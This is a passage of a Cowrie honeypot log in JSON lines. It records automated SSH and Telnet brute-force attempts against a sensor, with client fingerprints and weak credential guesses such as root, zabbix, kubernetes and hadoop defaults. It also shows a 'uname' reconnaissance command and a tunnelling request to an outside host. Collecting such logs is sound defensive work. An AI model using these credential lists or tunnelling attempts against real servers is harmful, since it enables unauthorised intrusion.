"ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:49:46.144955Z","src_ip":"212.227.235.229","session":"e3f3b54ab556"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:49:46.716266Z","src_ip":"212.227.235.229","session":"e3f3b54ab556"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:49:47.021956Z","src_ip":"212.227.235.229","session":"e3f3b54ab556"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:49:47.022716Z","src_ip":"212.227.235.229","session":"e3f3b54ab556"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:47.168237Z","src_ip":"212.227.235.229","session":"e3f3b54ab556"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:47.169463Z","src_ip":"212.227.235.229","session":"e3f3b54ab556"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36410,"dst_ip":"1.2.3.4","dst_port":22,"session":"48180af29277","protocol":"ssh","message":"New connection: 212.227.125.160:36410 (1.2.3.4:22) [session: 48180af29277]","sensor":"my-vps","timestamp":"2025-08-28T05:49:57.823735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:49:57.824894Z","src_ip":"212.227.125.160","session":"48180af29277"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:49:57.929860Z","src_ip":"212.227.125.160","session":"48180af29277"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-28T05:49:58.247160Z","src_ip":"212.227.125.160","session":"48180af29277"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:49:59.355061Z","src_ip":"212.227.125.160","session":"48180af29277"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60820,"dst_ip":"1.2.3.4","dst_port":22,"session":"af6a890e0f2a","protocol":"ssh","message":"New connection: 212.227.235.229:60820 (1.2.3.4:22) [session: af6a890e0f2a]","sensor":"my-vps","timestamp":"2025-08-28T05:50:05.040585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:05.041547Z","src_ip":"212.227.235.229","session":"af6a890e0f2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60032,"dst_ip":"1.2.3.4","dst_port":22,"session":"11ee3cbffbde","protocol":"ssh","message":"New connection: 212.227.125.160:60032 (1.2.3.4:22) [session: 11ee3cbffbde]","sensor":"my-vps","timestamp":"2025-08-28T05:50:05.131318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:05.132128Z","src_ip":"212.227.125.160","session":"11ee3cbffbde"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:50:05.186073Z","src_ip":"212.227.235.229","session":"af6a890e0f2a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:50:05.237401Z","src_ip":"212.227.125.160","session":"11ee3cbffbde"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-28T05:50:05.556053Z","src_ip":"212.227.125.160","session":"11ee3cbffbde"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-28T05:50:05.619826Z","src_ip":"212.227.235.229","session":"af6a890e0f2a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:06.665397Z","src_ip":"212.227.125.160","session":"11ee3cbffbde"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:06.765675Z","src_ip":"212.227.235.229","session":"af6a890e0f2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48734,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b875fe3220f","protocol":"ssh","message":"New connection: 212.227.235.229:48734 (1.2.3.4:22) [session: 6b875fe3220f]","sensor":"my-vps","timestamp":"2025-08-28T05:50:13.457293Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:13.458565Z","src_ip":"212.227.235.229","session":"6b875fe3220f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:50:13.604566Z","src_ip":"212.227.235.229","session":"6b875fe3220f"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-28T05:50:14.061136Z","src_ip":"212.227.235.229","session":"6b875fe3220f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:15.208472Z","src_ip":"212.227.235.229","session":"6b875fe3220f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57618,"dst_ip":"1.2.3.4","dst_port":22,"session":"6544229f5db3","protocol":"ssh","message":"New connection: 212.227.125.160:57618 (1.2.3.4:22) [session: 6544229f5db3]","sensor":"my-vps","timestamp":"2025-08-28T05:50:19.795506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:19.807147Z","src_ip":"212.227.125.160","session":"6544229f5db3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:50:19.904335Z","src_ip":"212.227.125.160","session":"6544229f5db3"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:50:20.320220Z","src_ip":"212.227.125.160","session":"6544229f5db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3020,"dst_ip":"1.2.3.4","dst_port":22,"session":"5afc820be6fd","protocol":"ssh","message":"New connection: 212.227.235.229:3020 (1.2.3.4:22) [session: 5afc820be6fd]","sensor":"my-vps","timestamp":"2025-08-28T05:50:20.542801Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:20.543814Z","src_ip":"212.227.235.229","session":"5afc820be6fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3388,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f1f7014965b","protocol":"ssh","message":"New connection: 212.227.235.229:3388 (1.2.3.4:22) [session: 3f1f7014965b]","sensor":"my-vps","timestamp":"2025-08-28T05:50:20.704097Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:20.705104Z","src_ip":"212.227.235.229","session":"3f1f7014965b"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T05:50:20.866478Z","src_ip":"212.227.235.229","session":"3f1f7014965b"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:50:21.352317Z","src_ip":"212.227.235.229","session":"3f1f7014965b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T05:50:21.516554Z","session":"3f1f7014965b"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:21.841036Z","src_ip":"212.227.125.160","session":"6544229f5db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34384,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bfa8569d101","protocol":"ssh","message":"New connection: 212.227.235.229:34384 (1.2.3.4:22) [session: 0bfa8569d101]","sensor":"my-vps","timestamp":"2025-08-28T05:50:35.238458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:35.239574Z","src_ip":"212.227.235.229","session":"0bfa8569d101"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:50:35.382947Z","src_ip":"212.227.235.229","session":"0bfa8569d101"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:50:35.823334Z","src_ip":"212.227.235.229","session":"0bfa8569d101"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:36.968152Z","src_ip":"212.227.235.229","session":"0bfa8569d101"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49566,"dst_ip":"1.2.3.4","dst_port":22,"session":"113215d0affd","protocol":"ssh","message":"New connection: 212.227.125.160:49566 (1.2.3.4:22) [session: 113215d0affd]","sensor":"my-vps","timestamp":"2025-08-28T05:50:38.478932Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:38.480249Z","src_ip":"212.227.125.160","session":"113215d0affd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:50:38.591212Z","src_ip":"212.227.125.160","session":"113215d0affd"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":40032,"dst_ip":"1.2.3.4","dst_port":23,"session":"e84b3509c9cb","protocol":"telnet","message":"New connection: 8.222.212.69:40032 (1.2.3.4:23) [session: e84b3509c9cb]","sensor":"my-vps","timestamp":"2025-08-28T05:50:38.663637Z"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:50:38.908941Z","src_ip":"212.227.125.160","session":"113215d0affd"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:50:40.016715Z","src_ip":"212.227.125.160","session":"113215d0affd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52518,"dst_ip":"1.2.3.4","dst_port":22,"session":"698685e19f98","protocol":"ssh","message":"New connection: 212.227.125.160:52518 (1.2.3.4:22) [session: 698685e19f98]","sensor":"my-vps","timestamp":"2025-08-28T05:50:53.007953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:50:53.009544Z","src_ip":"212.227.125.160","session":"698685e19f98"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:50:53.114433Z","src_ip":"212.227.125.160","session":"698685e19f98"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-28T05:50:53.430904Z","src_ip":"212.227.125.160","session":"698685e19f98"}
